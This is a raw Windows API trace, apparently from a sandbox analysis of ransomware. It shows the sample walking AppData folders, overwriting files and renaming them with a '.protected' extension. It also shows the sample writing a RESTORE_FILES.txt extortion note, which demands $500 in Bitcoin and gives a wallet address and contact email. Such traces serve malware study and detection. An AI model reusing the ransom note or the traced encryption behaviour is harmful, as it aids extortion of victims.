131 [0089.558] StrStrW (lpFirst="A9B8213768ADC68AF64FCC6409E8BE414726687F.crl", lpSrch=".txt") returned 0x0 [0089.558] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\A9B8213768ADC68AF64FCC6409E8BE414726687F.crl") returned 131 [0089.558] StrStrW 
(lpFirst="A9B8213768ADC68AF64FCC6409E8BE414726687F.crl", lpSrch=".rar") returned 0x0 [0089.558] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\A9B8213768ADC68AF64FCC6409E8BE414726687F.crl") returned 131 [0089.558] StrStrW (lpFirst="A9B8213768ADC68AF64FCC6409E8BE414726687F.crl", lpSrch=".zip") returned 0x0 [0089.558] ReadFile (in: hFile=0x158, lpBuffer=0x513c88, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x513c88*, lpNumberOfBytesRead=0x295e2d4*=0x2800, lpOverlapped=0x0) returned 1 [0089.587] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.587] WriteFile (in: hFile=0x158, lpBuffer=0x513c88*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x513c88*, lpNumberOfBytesWritten=0x295e2d4*=0x2800, lpOverlapped=0x0) returned 1 [0089.587] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.587] WriteFile (in: hFile=0x158, lpBuffer=0x295e2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 [0089.595] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 [0089.595] CloseHandle (hObject=0x158) returned 1 [0089.599] wnsprintfW (in: pszDest=0x513c88, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\A9B8213768ADC68AF64FCC6409E8BE414726687F.crl.protected") returned 141 [0089.599] MoveFileW 
(lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\A9B8213768ADC68AF64FCC6409E8BE414726687F.crl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\acrobat\\10.0\\security\\crlcache\\a9b8213768adc68af64fcc6409e8be414726687f.crl"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\A9B8213768ADC68AF64FCC6409E8BE414726687F.crl.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\acrobat\\10.0\\security\\crlcache\\a9b8213768adc68af64fcc6409e8be414726687f.crl.protected")) returned 1 [0089.601] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 0 [0089.601] FindClose (in: hFindFile=0x47bb10 | out: hFindFile=0x47bb10) returned 1 [0089.601] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\RESTORE_FILES.txt") returned 104 [0089.601] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\acrobat\\10.0\\security\\crlcache\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0089.643] lstrlenA (lpString="! 
SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0089.643] WriteFile (in: hFile=0x154, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e2d4*=0x53d, lpOverlapped=0x0) returned 1 [0089.644] lstrlenA (lpString="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") returned 684 [0089.644] WriteFile (in: hFile=0x154, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e2d4*=0x2ac, lpOverlapped=0x0) returned 1 
[0089.644] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0089.644] WriteFile (in: hFile=0x154, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e2d4*=0xb1, lpOverlapped=0x0) returned 1 [0089.644] CloseHandle (hObject=0x154) returned 1 [0089.644] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0 [0089.644] FindClose (in: hFindFile=0x47bad0 | out: hFindFile=0x47bad0) returned 1 [0089.644] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\RESTORE_FILES.txt") returned 95 [0089.644] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\acrobat\\10.0\\security\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0089.645] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0089.645] WriteFile (in: hFile=0x150, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e544*=0x53d, lpOverlapped=0x0) returned 1 [0089.646] lstrlenA (lpString="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") returned 684 [0089.646] WriteFile (in: hFile=0x150, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e544*=0x2ac, lpOverlapped=0x0) returned 1 [0089.646] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0089.646] WriteFile (in: hFile=0x150, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e544*=0xb1, 
lpOverlapped=0x0) returned 1 [0089.646] CloseHandle (hObject=0x150) returned 1 [0089.646] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0 [0089.646] FindClose (in: hFindFile=0x47ba90 | out: hFindFile=0x47ba90) returned 1 [0089.646] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\RESTORE_FILES.txt") returned 86 [0089.646] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\acrobat\\10.0\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0089.648] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0089.648] WriteFile (in: hFile=0x14c, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e7b4*=0x53d, lpOverlapped=0x0) returned 1 [0089.648] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0089.648] WriteFile (in: hFile=0x14c, 
lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e7b4*=0x2ac, lpOverlapped=0x0) returned 1 [0089.649] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0089.649] WriteFile (in: hFile=0x14c, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e7b4*=0xb1, lpOverlapped=0x0) returned 1 [0089.649] CloseHandle (hObject=0x14c) returned 1 [0089.650] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0089.650] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0089.650] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\RESTORE_FILES.txt") returned 81 [0089.650] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\acrobat\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0089.651] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0089.651] WriteFile (in: hFile=0xd8, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ea24*=0x53d, lpOverlapped=0x0) returned 1 [0089.652] lstrlenA (lpString="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") returned 684 [0089.652] WriteFile (in: hFile=0xd8, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ea24*=0x2ac, lpOverlapped=0x0) returned 1 [0089.652] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0089.652] WriteFile (in: hFile=0xd8, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ea24*=0xb1, 
lpOverlapped=0x0) returned 1 [0089.652] CloseHandle (hObject=0xd8) returned 1 [0089.652] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0089.652] lstrcmpiW (lpString1="Flash Player", lpString2="Windows") returned -1 [0089.652] lstrcmpiW (lpString1="Flash Player", lpString2="Program Files") returned -1 [0089.652] lstrcmpiW (lpString1="Flash Player", lpString2="Program Files (x86)") returned -1 [0089.652] lstrcmpiW (lpString1="Flash Player", lpString2="$Recycle.bin") returned 1 [0089.652] lstrcmpiW (lpString1="Flash Player", lpString2="System Volume Information") returned -1 [0089.652] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player") returned 68 [0089.652] lstrcmpW (lpString1="Flash Player", lpString2=".") returned 1 [0089.652] lstrcmpW (lpString1="Flash Player", lpString2="..") returned 1 [0089.652] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\*") returned 70 [0089.652] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0089.653] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0089.653] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0089.653] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0089.653] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0089.653] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0089.653] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\.") returned 70 [0089.653] lstrcmpW (lpString1=".", lpString2=".") returned 0 
[0089.653] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0089.653] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0089.653] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0089.654] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0089.654] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0089.654] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0089.654] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\..") returned 71 [0089.654] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0089.654] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0089.654] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0089.654] lstrcmpiW (lpString1="AssetCache", lpString2="Windows") returned -1 [0089.654] lstrcmpiW (lpString1="AssetCache", lpString2="Program Files") returned -1 [0089.654] lstrcmpiW (lpString1="AssetCache", lpString2="Program Files (x86)") returned -1 [0089.654] lstrcmpiW (lpString1="AssetCache", lpString2="$Recycle.bin") returned 1 [0089.654] lstrcmpiW (lpString1="AssetCache", lpString2="System Volume Information") returned -1 [0089.654] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache") returned 79 [0089.654] lstrcmpW (lpString1="AssetCache", lpString2=".") returned 1 [0089.654] lstrcmpW (lpString1="AssetCache", lpString2="..") returned 1 [0089.654] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\*") returned 81 [0089.654] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\*", lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0x47ba90 [0089.654] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0089.654] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0089.654] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0089.654] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0089.654] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0089.654] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\.") returned 81 [0089.655] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0089.655] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0089.655] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0089.655] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0089.655] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0089.655] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0089.655] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0089.655] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\..") returned 82 [0089.655] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0089.655] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0089.655] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0089.655] lstrcmpiW (lpString1="D5NTRC6R", lpString2="Windows") returned -1 [0089.655] lstrcmpiW (lpString1="D5NTRC6R", lpString2="Program Files") returned -1 [0089.655] lstrcmpiW (lpString1="D5NTRC6R", lpString2="Program Files (x86)") returned 
-1 [0089.655] lstrcmpiW (lpString1="D5NTRC6R", lpString2="$Recycle.bin") returned 1 [0089.655] lstrcmpiW (lpString1="D5NTRC6R", lpString2="System Volume Information") returned -1 [0089.655] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\D5NTRC6R") returned 88 [0089.655] lstrcmpW (lpString1="D5NTRC6R", lpString2=".") returned 1 [0089.655] lstrcmpW (lpString1="D5NTRC6R", lpString2="..") returned 1 [0089.656] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\D5NTRC6R\\*") returned 90 [0089.656] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\D5NTRC6R\\*", lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0x47bad0 [0089.675] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0089.675] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0089.675] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0089.675] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0089.675] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0089.675] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\D5NTRC6R\\.") returned 90 [0089.675] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0089.675] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0089.675] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0089.675] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0089.675] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0089.675] lstrcmpiW 
(lpString1="..", lpString2="$Recycle.bin") returned 1 [0089.675] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0089.675] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\D5NTRC6R\\..") returned 91 [0089.675] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0089.675] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0089.675] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0 [0089.675] FindClose (in: hFindFile=0x47bad0 | out: hFindFile=0x47bad0) returned 1 [0089.675] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\D5NTRC6R\\RESTORE_FILES.txt") returned 106 [0089.676] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\D5NTRC6R\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\flash player\\assetcache\\d5ntrc6r\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0089.676] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
